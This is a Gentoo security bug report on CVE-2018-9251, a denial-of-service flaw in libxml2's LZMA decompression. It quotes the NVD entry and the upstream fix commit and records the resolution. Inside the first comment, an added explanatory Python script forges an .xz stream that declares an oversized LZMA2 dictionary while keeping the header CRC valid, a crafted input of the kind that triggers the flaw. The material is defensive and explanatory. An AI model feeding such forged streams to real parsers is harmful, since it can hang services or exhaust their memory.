
Bug 655626 (CVE-2018-9251)

Summary: <dev-libs/libxml2-2.9.8: memory consumption flaw in LZMA decompression (DoS)
Product: Gentoo Security
Reporter: D'juan McDonald (domhnall) <flopwiki>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: minor
CC: gnome
Priority: Normal
Version: unspecified
Hardware: All
OS: Linux
URL: https://bugzilla.gnome.org/show_bug.cgi?id=794914
Whiteboard: C3 [noglsa cve]
Package list:
Runtime testing required: ---

Description D'juan McDonald (domhnall) 2018-05-13 06:10:57 UTC
(https://nvd.nist.gov/vuln/detail/CVE-2018-9251):

The xz_decomp function in xzlib.c in libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035.

Reference:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895195
Comment 1 D'juan McDonald (domhnall) 2018-05-28 21:18:30 UTC
commit e2a9122b8dde53d320750451e9907a7dcb2ca8bb (refs/bisect/bad)
Author: Nick Wellnhofer <wellnhofer@aevum.de>
Date:   Thu Sep 7 18:36:01 2017 +0200

    Set memory limit for LZMA decompression

    Otherwise malicious LZMA compressed files could consume large amounts
    of memory when decompressed.

    According to the xz man page, files compressed with `xz -9` currently
    require 65 MB to decompress, so set the limit to 100 MB.

    Should fix bug 786696.

$ git describe --contains e2a9122b8dde53d320750451e9907a7dcb2ca8bb
v2.9.6-rc1~7

@maintainer(s), please ack if the patch was already applied with the commits for 652976.
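Added example (not libxml2 code, not from this bug's reporter or the libxml2 commit): the NVD text above says the DoS is triggered by input that makes liblzma return LZMA_MEMLIMIT_ERROR, and the commit quoted above is where libxml2 started passing a 100 MB memlimit, which is the only condition under which liblzma returns that code. The script below uses Python's stdlib lzma module (a binding to the same liblzma decoder API) to show the two halves of that: it forges an .xz stream whose LZMA2 block header declares a 768 MiB dictionary while the compressed bytes stay identical in length, and it decodes both the honest and the forged stream under the commit's 100 MB limit. Assumptions: SAMPLE_XML is a constructed payload; the block-header layout handled is the single-block, single-filter one that lzma.compress() emits; the property byte 0x23 (768 MiB) is an arbitrary choice above the limit.

```python
"""Forge an .xz stream that declares an oversized LZMA2 dictionary and show that
a liblzma decoder with a memlimit rejects it before allocating anything.

Added example, not libxml2 or liblzma code. Byte layout follows the .xz file
format: 12-byte stream header, then a block header whose first byte encodes
its size and which ends with a little-endian CRC32 over the preceding bytes."""
import lzma
import struct
import zlib

STREAM_HEADER_LEN = 12              # 6-byte magic, 2 stream flag bytes, CRC32
FILTER_ID_LZMA2 = 0x21
MEMLIMIT_100MB = 100 * 1024 * 1024  # the limit the libxml2 commit above chose

# Constructed sample payload (assumption); any XML document would do.
SAMPLE_XML = b"<?xml version='1.0'?><doc>" + b"<item>x</item>" * 2000 + b"</doc>"


def lzma2_dict_size(props: int) -> int:
    """Decode the one-byte LZMA2 dictionary-size property (spec formula)."""
    if props > 40:
        raise ValueError("invalid LZMA2 properties byte")
    if props == 40:
        return 0xFFFFFFFF
    return (2 | (props & 1)) << (props // 2 + 11)


def _read_vli(buf: bytes, pos: int):
    """Read an xz variable-length integer; return (value, next_pos)."""
    value, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7


def _locate_lzma2_props(blob: bytes):
    """Return (block_header_start, block_header_end, props_byte_offset) for the
    first block of a single-filter .xz stream as produced by lzma.compress()."""
    start = STREAM_HEADER_LEN
    end = start + (blob[start] + 1) * 4          # header size byte
    if blob[start + 1] & 0x03:                   # block flags: filter count - 1
        raise ValueError("example only handles a single-filter chain")
    filter_id, pos = _read_vli(blob, start + 2)
    props_len, pos = _read_vli(blob, pos)
    if filter_id != FILTER_ID_LZMA2 or props_len != 1:
        raise ValueError("expected an LZMA2 filter with a 1-byte property")
    return start, end, pos


def declared_dict_size(blob: bytes) -> int:
    """Dictionary size the block header asks the decoder to allocate."""
    _, _, off = _locate_lzma2_props(blob)
    return lzma2_dict_size(blob[off])


def inflate_declared_dict(blob: bytes, props: int) -> bytes:
    """Rewrite the LZMA2 dictionary-size byte and repair the block-header CRC32.
    Nothing else changes, so the stream still parses as well-formed."""
    start, end, off = _locate_lzma2_props(blob)
    hdr = bytearray(blob[start:end])
    hdr[off - start] = props
    hdr[-4:] = struct.pack("<I", zlib.crc32(bytes(hdr[:-4])) & 0xFFFFFFFF)
    return blob[:start] + bytes(hdr) + blob[end:]


def decompress_bounded(blob: bytes, memlimit: int):
    """Decode under liblzma's memlimit. Returns (True, data) or (False, reason).
    LZMA_MEMLIMIT_ERROR surfaces as LZMAError and is treated as terminal,
    i.e. the decode loop stops instead of retrying the same call."""
    dec = lzma.LZMADecompressor(format=lzma.FORMAT_XZ, memlimit=memlimit)
    try:
        return True, dec.decompress(blob)
    except lzma.LZMAError as exc:
        return False, str(exc)


def build_samples():
    """Compress the sample with a 1 MiB dictionary, then forge a copy that
    declares 768 MiB (property byte 0x23, an arbitrary value above the limit)."""
    original = lzma.compress(
        SAMPLE_XML, format=lzma.FORMAT_XZ,
        filters=[{"id": lzma.FILTER_LZMA2, "dict_size": 1 << 20}])
    crafted = inflate_declared_dict(original, 0x23)
    return original, crafted


if __name__ == "__main__":
    orig, bad = build_samples()
    print("declared dict: %d MiB -> %d MiB, same length: %s" % (
        declared_dict_size(orig) >> 20, declared_dict_size(bad) >> 20,
        len(orig) == len(bad)))
    print("original under 100 MB limit:", decompress_bounded(orig, MEMLIMIT_100MB)[0])
    print("crafted  under 100 MB limit:", decompress_bounded(bad, MEMLIMIT_100MB))
```

The point for a decoder author is the last function: once a memlimit is set, LZMA_MEMLIMIT_ERROR is a normal return value of lzma_code(), and a loop that only recognises LZMA_OK and LZMA_STREAM_END will call lzma_code() again with the same input and the same result forever, which is the behaviour the NVD entry describes. Without the memlimit the forged header instead asks liblzma to allocate the full declared dictionary, which is what the quoted commit was written to prevent.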
Comment 2 D'juan McDonald (domhnall) 2018-07-26 08:44:15 UTC
Vulnerable versions have been dropped via commit 2bea1ac35a4e6955517315078a2176c94cb4388d
Comment 3 Christopher Díaz Riveros (RETIRED) gentoo-dev Security 2018-07-26 08:48:01 UTC
We are done here it seems.


GLSA Vote: No.


Thank you,